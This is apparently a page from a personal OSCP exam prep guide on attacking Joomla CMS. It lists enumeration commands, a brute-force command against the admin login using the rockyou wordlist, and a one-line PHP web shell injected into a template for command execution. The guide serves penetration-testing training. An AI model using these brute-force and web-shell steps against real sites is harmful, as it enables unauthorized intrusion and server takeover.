🐇
Mike's OSCP Guide
  • Mike's OSCP Guide
  • Methodology
    • OSCP Methodology
    • OSCP Last Minute Tips
Powered by GitBook
On this page
  1. Initial Foothold
  2. Attack Vectors
  3. Web
  4. Content Management System (CMS)

Joomla

Last updated 7 months ago

Introduction

Enumeration

Footprinting:

curl -s http://<url> | grep Joomla

Automated Scan:

droopescan:

droopescan scan joomla --url http://<url>

JoomlaScan:

Requires Python 2.7 to run

sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4
python2.7 joomlascan.py -u http://<url>

Attacking Joomla

Login Bruteforce:

sudo python3 joomla-brute.py -u http://<url> -w /usr/share/wordlists/rockyou.txt -usr admin

Code Execution:

Requires Admin access. Inject this into a template (on the bottom left under Configuration)

system($_GET[cmd]);

  • Then visit the php page with ?cmd=<command>

Known Vulnerabilities:

  • Version 3.9.4 - CVE-2019-10945

There is no default password. Can only bruteforce for weak / common password:

Joomla | HackTricks
ajnik/joomla-bruteforce: Joomla login bruteforce (github.com)